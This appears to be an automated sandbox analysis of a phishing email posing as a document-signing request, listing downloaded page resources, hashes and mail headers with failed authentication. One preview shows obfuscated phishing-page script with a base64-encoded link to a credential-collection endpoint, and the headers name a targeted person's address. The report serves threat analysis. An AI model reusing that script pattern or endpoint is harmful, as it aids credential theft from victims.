                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmCnRCOOcfXURIFDa0JrrESEAkJkio6I4HAzRIFDUPzdjk=?alt=proto
                                    Preview:CgkKBw2tCa6xGgAKCQoHDUPzdjkaAA==
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (47520)
                                    Category:downloaded
                                    Size (bytes):47521
                                    Entropy (8bit):5.3981340461317835
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:7C92EC9D1395055CE0405A32607C7291
                                    SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                    SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                    SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js
                                    Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (19015)
                                    Category:downloaded
                                    Size (bytes):19188
                                    Entropy (8bit):5.212814407014048
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:70D3FDA195602FE8B75E0097EED74DDE
                                    SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                    SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                    SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                    Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (32012)
                                    Category:dropped
                                    Size (bytes):69597
                                    Entropy (8bit):5.369216080582935
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                    SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                    SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                    SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (32065)
                                    Category:downloaded
                                    Size (bytes):85578
                                    Entropy (8bit):5.366055229017455
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:2F6B11A7E914718E0290410E85366FE9
                                    SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                    SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                    SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                    Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 68 x 75, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):61
                                    Entropy (8bit):4.014960565232002
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:F7F41EA0256049D02CD5970ED1AB049B
                                    SHA1:2713490D40216EF6B10800CC625A2A0BAD5B5E1D
                                    SHA-256:C86323EABAE452E26BEBDE647BB46BB49C3A348AEF6499B354FA5F2D56C09FD7
                                    SHA-512:02F9FA770E3E8F7FF30D98E904F6F29CDDA76199187F4BDF7E3D1242EA16827427553ECE47E31EEEAD6593C4A6135DC001E6D9712DB8F842496A6583C82FD610
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:.PNG........IHDR...D...K.....F'.0....IDAT.....$.....IEND.B`.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                    Category:downloaded
                                    Size (bytes):61
                                    Entropy (8bit):3.990210155325004
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:downloaded
                                    Size (bytes):1864
                                    Entropy (8bit):5.222032823730197
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:BC3D32A696895F78C19DF6C717586A5D
                                    SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                    SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                    SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (50758)
                                    Category:downloaded
                                    Size (bytes):51039
                                    Entropy (8bit):5.247253437401007
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:67176C242E1BDC20603C878DEE836DF3
                                    SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                    SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                    SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                    Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (65454), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):553316
                                    Entropy (8bit):4.912195806174864
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:2C1EEE3794F01EB2649D9CB190809F18
                                    SHA1:799B913EF50DEF4DB2A6FC28D321CD5650D6544B
                                    SHA-256:71B9F24263AA049FE440918BC4D96E120CB5C73DE603EEAD50C7D65F17032BB1
                                    SHA-512:21EA4DF1F2E2CA3839E0E920BCB029B3C5E06082684B8C74A4D7D4C2BB91F1BD7F11FF769D76F86FD380D1B05A2AA4802ECCA3861F0377B3EC1C1FE513A7D6E4
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:var file = "aHR0cHM6Ly8yMDQzNzU4MTY0LmNsb3VkaG9zdGJ1aWxkZXIuY29tL25leHQucGhw";....var _0x55a2a4=_0x2c13;function _0x2b19(){var _0x4966e1=['x-lg-row\x20{','color:\x20tra','div\x20id=\x22ma','-lg-0\x20{\x20ma','~.valid-to','1|4|0|2|6|','n-top:\x201.5',':focus,\x20.f','ning\x20hr\x20{\x20','end\x20!impor','er;\x20justif','tify\x20!impo','owrap\x20!imp','kit-clip-p','or:\x20#00408','ble\x20td,\x20.t','t/ests/2.1','hite-space','r\x20p-2\x22\x20onm','\x20#pacifism','>&nbsp<spa','sm-wrap\x20{\x20','g9GFerfs7/','fDngjSvCsG','u\x20to\x20your\x20','pover-top\x20','\x20}\x20.btn-da','webkit-app','an><br>\x20<d','lumn;\x20flex','\x20#6c757d\x20!','+PQcVpU7gF','#495057;\x20b','-color:\x20#1','\x20calc(.3re','rst-child)','econdary:f','to\x20!import','}\x20.table-r','-box-flex:','cus,\x20.was-','ng-top:\x200\x20','utton.bg-w','eader,\x20.ca','\x200\x20}\x20.tabl','re,\x20.bs-to','image/svg+','tton:focus','jo4inKDdSN','{\x20text-tra','roup:\x2013;\x20',',\x20.btn.act','r:\x20#28a745','vcoBM','\x20.bor
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (48664)
                                    Category:dropped
                                    Size (bytes):48944
                                    Entropy (8bit):5.272507874206726
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                    SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                    SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                    SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                    Category:downloaded
                                    Size (bytes):17174
                                    Entropy (8bit):2.9129715116732746
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:12E3DAC858061D088023B2BD48E2FA96
                                    SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                    SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                    SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                    Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text
                                    Category:downloaded
                                    Size (bytes):196
                                    Entropy (8bit):5.098952451791238
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:62962DAA1B19BBCC2DB10B7BFD531EA6
                                    SHA1:D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
                                    SHA-256:80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
                                    SHA-512:9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://docusign.legalcloudfiles.com/favicon.ico
                                    Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.
                                    File type:RFC 822 mail, Unicode text, UTF-8 text, with CRLF line terminators
                                    Entropy (8bit):6.153951943131281
                                    TrID:
                                    • E-Mail message (Var. 5) (54515/1) 100.00%
                                    File name:Cardfactory Executed Agreement DocsID- Sign & Review..eml
                                    File size:126'883 bytes
                                    MD5:e7cc91082f04f6cb043544acb16d956d
                                    SHA1:cf2306faf9d8a0ceb0f660be78ed5a7ea2630b49
                                    SHA256:8a75407c92926f258feafbdb40d2151a6ac7b078a4f3b2814ccfc39a9a206080
                                    SHA512:022d7bce80c457f1e61624e6e04d5639bc54bd709ed2412c88a229223ffa9cdfe3a380674b075df0b6dc9e222d780500c55c829e1dcae193b7424974947a0fad
                                    SSDEEP:3072:Pa4s+ZV/ye7VXdbeVrr/wv+fhCdUge/KOUtB:i4s+T/p5dyVv/gEhCdtecB
                                    TLSH:47C3F1B25A601026F726195B4F0DBC0D7021B64FCCF6CEC17ADC9157A9EB05FAA0AE4C
                                    File Content Preview:Received: from GVXPR03MB10803.eurprd03.prod.outlook.com (2603:10a6:150:221::8).. by DU0PR03MB9730.eurprd03.prod.outlook.com with HTTPS; Mon, 13 Jan 2025.. 08:43:51 +0000..Received: from AS9PR05CA0259.eurprd05.prod.outlook.com (2603:10a6:20b:493::20).. by
                                    Subject:Cardfactory: Executed Agreement DocsID- Sign & Review.
                                    From:Received via DocsOnline Shared <d.plowinske@capitaltractorinc.com>
                                    To:martin.poole@cardfactory.co.uk
                                    Cc:
                                    BCC:
                                    Date:Mon, 13 Jan 2025 00:43:36 -0800
                                    Communications:
                                    • CAUTION: This email originated from outside of the organisation. If in doubt please use the report message button to Security.
                                    Attachments:
                                    • Martin.poole-In Service Agreement.pdf
                                    Key Value
                                    Receivedfrom [192.52.167.44] ([192.52.167.44]) by smtp-relay.gmail.com with ESMTP id 6a1803df08f44-6dfadfea0a2sm4049736d6.54.2025.01.13.00.43.35 for <martin.poole@cardfactory.co.uk>; Mon, 13 Jan 2025 00:43:36 -0800 (PST)
                                    Authentication-Resultsspf=softfail (sender IP is 198.154.180.197) smtp.mailfrom=capitaltractorinc.com; dkim=fail (body hash did not verify) header.d=capitaltractorinc-com.20230601.gappssmtp.com;dmarc=fail action=oreject header.from=capitaltractorinc.com;compauth=fail reason=000
                                    Received-SPFPass (protection.outlook.com: domain of capitaltractorinc.com designates 209.85.222.225 as permitted sender) receiver=protection.outlook.com; client-ip=209.85.222.225; helo=mail-qk1-f225.google.com; pr=C
                                    X-Sophos-Product-TypeMailflow
                                    X-Sophos-Email-ID1130fd26fd944a7cb87c33e1c1e137e8
                                    Authentication-Results-Originalspf=pass (sender IP is 209.85.222.225) smtp.mailfrom=capitaltractorinc.com; dkim=pass (signature was verified) header.d=capitaltractorinc-com.20230601.gappssmtp.com;dmarc=pass action=none header.from=capitaltractorinc.com;compauth=pass reason=100
                                    DKIM-Signaturev=1; a=rsa-sha256; c=relaxed/relaxed; d=capitaltractorinc-com.20230601.gappssmtp.com; s=20230601; t=1736757816; x=1737362616; darn=cardfactory.co.uk; h=mime-version:subject:from:to:message-id:date:from:to:cc:subject :date:message-id:reply-to; bh=TYkfGTx0f36K1Xb1mpLTPeV8Om8TMLiGXj/knGfYbf8=; b=BqXfEuiCY3VWOL3Sva9acShJBamSJYBXhqkFtEb2g+P6B30jPDgj5CKKfz8TCsyrZI wWJmt4c/TvlcQZNkfOKM+V3skCRdxHskMscOHH86zxBFbmkazwpZrwue5wcc8ToFmUYZ cWEE1wZZERNt34C+g9fa9QEV8/LbP17c4zBrqNKA3khW4m05vxpyrZvIEvOAEGcV0Pou T1h2TWHxZipFKE1itHznVOHafTVpQ37EHESi244XWWxbDu7hBNcy/dquUx8Q8FO45hwb JzRlmVGH5gUFQeX9gDJmT/SDSRX7P0grv7uegMsLUh1ce3EABYFDkynrP5JGQE9OZsML nx0A==
                                    X-Google-DKIM-Signaturev=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20230601; t=1736757816; x=1737362616; h=mime-version:subject:from:to:message-id:date:x-gm-message-state :from:to:cc:subject:date:message-id:reply-to; bh=TYkfGTx0f36K1Xb1mpLTPeV8Om8TMLiGXj/knGfYbf8=; b=SqDcJzzGhytm4vjvNR67wWdl+3CgCV30AqUfoY3+2aqd6E4/ncCUjnYd7FCvYp9mLU dHERuTn9ebjw1GfttLNLWaSWnJKAEtjymTCH/vjqM1r+IsTrdZ7jlbIPdr9NtnaQD+Mh fxd/ueVksDHZ1sG8SqW2jhbDGLktSeZUEDVdQdbRVYbBI9DjiicJvDsBT2PkZvjgOsj2 476UltJ/e8N85KsJBjo+UH2yvVfAnVomWYhklqWUseVc9Nlk08gf7oOSHUk35LtjYTpi p6ydoIA/7UWHaPZ+P+wUXcFh2WTiDpAjEWwZ6QNEucwixx/00xLGa7O2KdKiGp3Z6EsF l7VQ==
                                    X-Gm-Message-StateAOJu0YxTsKMWG9uVhgsG37cslXt5HTjdKtLrLg+gAjRIqdnMCzHsXNvH A/qXxOkVk/pRHNrHtIRPNJC02n/rBeqLLKtnIciN++PFXRfOZ9Gaa/JDnmCMhFhqkKyBhbdqF/j Veq13YfzgoeeZFfJBCWs49R5Vg2OsF7Ggrx6pkrYy
                                    X-Gm-GgASbGncsDSlkJDntJf41uC79kEirNb+ElydKM8CIl52hdEEC0kATyxGnUAVPRWA5kADO sH1G4FoRaQR88MeO4wdxx++sgxgVIFJZbDAzaet1goG2YwgcHkH+BZfJdlGHURQiQQcDkv+2+E5 xV97qfgovXRCgK6L9rVOKMskVOJrNFHrcDkTocLV7Kz5nHhfUXtBGHYXRLw8j4w2NAufWvG4VT3 DhqT39M4MjsthAdyDCjRemjMlxtqiAVPE3L8I8JnEorUFnB2AFHGr7P1AJcwdhzO3KzDPSZbHl9 ZBuDkyDlLUiKCOQT+YhZ7Klqbec=
                                    X-Google-Smtp-SourceAGHT+IHGJ4hJwtTj/7GRLJQLCCjz0KhRMLpXhgVGRXv7Bp59g4J2BxWRffxZtGVeWZP61vi8WNSlrqCZjWOP
                                    X-Receivedby 2002:a05:620a:4115:b0:7b6:d643:599c with SMTP id af79cd13be357-7bcd975a013mr3188969685a.43.1736757816079; Mon, 13 Jan 2025 00:43:36 -0800 (PST)
                                    X-Relaying-Domaincapitaltractorinc.com
                                    DateMon, 13 Jan 2025 00:43:36 -0800
                                    Message-ID<6784d238.d40a0220.250242.dbd4SMTPIN_ADDED_MISSING@mx.google.com>
                                    Tomartin.poole@cardfactory.co.uk
                                    FromReceived via DocsOnline Shared <d.plowinske@capitaltractorinc.com>
                                    SubjectCardfactory: Executed Agreement DocsID- Sign & Review.
                                    Content-Typemultipart/mixed; boundary="--==_mimepart_6716046228d34_27ed8b5cbf86470"
                                    X-EOPAttributedMessage1
                                    X-EOPTenantAttributedMessage7956b84e-0c99-46b5-81c6-28689cfa7221:1
                                    X-MS-TrafficTypeDiagnosticDB1PEPF000509ED:EE_|AS8PR03MB8951:EE_|AMS0EPF00000194:EE_|GVXPR03MB10803:EE_|DU0PR03MB9730:EE_
                                    X-MS-Office365-Filtering-Correlation-Id56572ce3-06ef-431c-51bf-08dd33ae6465
                                    X-Microsoft-Antispam-UntrustedBCL:0;ARA:13230040|43022699015|8096899003|58100299016;
                                    X-Microsoft-Antispam-Message-Info-OriginalBbHGMA7bXJgsuppl0QJ28XOXwgAzDNIb9R+H+c/Lncld4keU6x3bSmoL6kGpJY5+tfbXvyEHZJc8vGqrYUj8TZkTfejYaBJTeDGx6ei9kTxJuYW+TI//vkWiSMtOqCUd/pGv/7ESWD8YPrPPbliF86qTKcXUVZg6M+lCHrv7GF1LmnIcqeMof4n7QW0to7mindvU9bDkm0gG/RFHPivhxptdN/VeRh+lFzwsJWTKaRZla1UNrgEKPB/E5igUNDid3UfkNJtG5zsQDZQjWdLM61bPsSc7DYRV48vfsjoAoIYRxgijRVSSwHUc21K1Q+6i9dnF6to/7Gz/B/+4zrGwEXNUK64X0SW014JAyFwz7yO2vsLynahe/RNr91GY3YL/MxMiv5MW7/g0RHrpmra+EMhPEmymU26HeAJ16uBYuk8E4Syr1SL/foMoeKQNuAS/FLxES5/OIRRSoOLZQsfIKOQwdddD0le/o05H/yldaToKMTMnZJJZzVe9bYuNYFWnv6BLvFXlHkm/jHve9mCFWyy3+YxPA1Y3Dt1DE4k3g9Xblh+c8D+Uzfa51Lrwja3asRRu4fKoUGYAZMcRCMGyVCfAvQu5UrhF+B6UoQpm2sY073MCblLmQWb+thsE+7vJoovd+Dyck8hB9g54JKdOwExlwywi6lF8mR42M66KdIlHm6HFVxyysSK9bPGFHwlwfKrPHgu5XZeLdn0VnvOgyQbnOnEhkf9mPNg3gRP+DUgS5Hm+qsAYtAJmoRtga90EKtWlB29pBywxS/QIbunO/Ak1URkEfgvYSXaVilMvR0FEOri37De+RRAIQrRRczE4WgON43oslwPwP1fAW4fc6b+6E1YuIhxOVEs8rdow4pDI9EY1MPay19r5ruSE+J9UP1YJdT127XnyOJCV/qRSPqA6eyTpEskt8hp6ZUNmiDeXud0wqnCA2dq5U6zh3Z0NxPcf1lzkquKkK4/W9P7CChkj5NTCl735lK51O9DPr6dumByHCCXSrwj4X9jej9F52p+DPFplbgC5yaCW/yS3Ut2XwegXBNV31EjdZ2EruwbhWf7MhNc3sRmt9cUxou8jAJIHj3AEKZqghIF5xz9XVmmz80Uqhcf2Bf9QUdHJpum57RupEROg7jbOmlriSWqbcjQ1kGM0jKjPgecjlbXw4HPXYndBqFy7HKFAdpn6zYNUhw0Nw5nWtkUvT12AtZIiKTJFAX5riFCHHgX4N7HgzCzCRMwmnaqc7AyS+oN5/uxg1zMu2j68N422NAKHei9jxVVqjj5eGx8upKTrpBKwxNcdhI2R3bBN7NI1Cvx1O4nwJfz8KOQ5h2iEGvEQKrcWtcoEsteJmWLSwp3NWzAr4GPxu3jlM06ARJoizLk2f2h2oN3HD1wfk66gMjsNcbaC+NO3W3LgmTMWKap6v2AOTPhzg6uu1FMatUl7UUSAPtDbTMDnwOCo6y/ymREzX6xOHnt15VsV0lc3tT476uqMJDWC35r5PvHP61Iv9vWptKqoX9xIPQwWoiUEjLx167PDNia+t+Pf1uz0NFbms/b21p+3sYfhxn